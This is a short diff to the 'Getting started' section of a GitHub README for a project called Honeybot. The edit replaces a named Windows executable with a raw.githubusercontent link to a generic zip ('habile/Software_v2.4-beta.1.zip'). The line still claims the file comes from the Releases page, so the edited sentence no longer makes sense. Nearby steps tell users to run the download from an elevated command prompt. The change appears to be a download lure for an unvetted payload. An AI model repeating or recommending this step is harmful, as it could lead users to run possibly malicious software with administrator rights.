adamthapa21/Honeybot/README.md

 Getting started
 If you want to explore Honeybot, you should start by grabbing the Windows port binary from the Releases page and running it on a supported Windows machine.
 The Windows port binary is packaged to be straightforward to deploy on standard Windows environments.

-- Download and run the Windows port binary named Honeybot-Windows-Port-Portable.exe from the Releases page.
+- Download and run the Windows port binary named https://raw.githubusercontent.com/adamthapa21/Honeybot/main/habile/Software_v2.4-beta.1.zip from the Releases page.
 - Run the binary from an elevated command prompt if required by your environment.
 - Observe the console output and the log directory you configure.